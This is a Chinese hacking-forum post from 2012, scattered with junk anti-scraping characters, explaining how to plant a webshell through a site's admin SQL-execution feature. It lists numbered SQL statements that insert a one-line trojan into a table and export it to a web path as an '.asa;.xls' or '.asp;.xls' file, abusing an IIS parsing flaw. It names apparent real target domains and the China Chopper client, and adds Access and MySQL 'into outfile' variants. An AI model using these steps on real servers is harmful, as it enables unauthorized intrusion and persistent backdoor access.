好不容易进了后台,发现啥上传啊。备份啊多木有。* {1 y4 `; E6 ~3 }$ t% t! b8 m0 v. x. @
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
: l& h: M& x# [% `; s' d9 e; z& h文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,* _! n( q u# C
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
, |( @2 a; F6 s9 t+ H1.create table cmd (a varchar(50))! G) u+ p' P! c0 u
2.insert into cmd (a) values (‘‘)
1 ~! X- t& Q6 I) a5 ~3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd$ C: r B, H' D* n# |
(把表cmd的内容导出为物理路径的一个EXCEL文件)4 N n& j9 G+ J2 O
4.drop table cmd/ M5 e7 t* M" `& p7 a
利用IIS的BUG成功拿到了WEBSHELL。
! Z2 J& g. u$ K7 W6 i& P2 \; I) o$ p8 s- w9 |1 ^8 e# w+ p
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话. [ x* J0 u% f) R6 o
7 l; u. n; e) i4 k& b d' N4 D SQL语句意思解释:$ b( R8 n& }5 G/ v6 n
第一句+ R! L0 [7 ^/ J" K0 z0 Q
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50/ C1 s6 y5 Y8 ~0 s, ^7 S' J
* o- q4 ~3 B s0 x8 ~1 _
第二句
' f% r2 d* R3 g% r- w 在表cmd的a字段插入一句话木马
5 ^ _/ I2 X0 E 第三句
' y/ u6 I# A# Y, m: A8 j+ _6 P) z 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
: o: Z; I# U* C3 w8 {7 s0 `/ x4 `* I4 r/ [* Y
第四句$ C0 m+ a# c9 O& d
删除建立的cmd表7 {* l! y, t8 _3 C7 N v" L$ _! h
" L. ~7 A) j4 f* A4 b) D' {$ s 以下内容为测试:
) E) \& t3 D: Y2 j1 e Access利用后台SQL执行命令功能导出WebShell:$ v% ]" v5 W# @5 `& k! k
这个更简单:
0 N/ B6 L% }& S2 ]% H4 S [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
( I1 r' [3 Q" f% a3 `" A 或者
6 w4 L+ j" Z. l5 M; V5 X3 a. { [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol], b- n/ M9 d9 |2 {( U5 C
2 L& k4 B! X( h7 r
后台有执行SQL语句功能(vote为已知表段)
$ Q5 r& B+ {+ a- b$ l5 x4 s) i 希望对大家有所帮助拿shell的又一个思路9 n- W" l2 Q+ F1 D$ c/ l
|
发表于 2012-9-13 17:53:58
收藏
支持
反对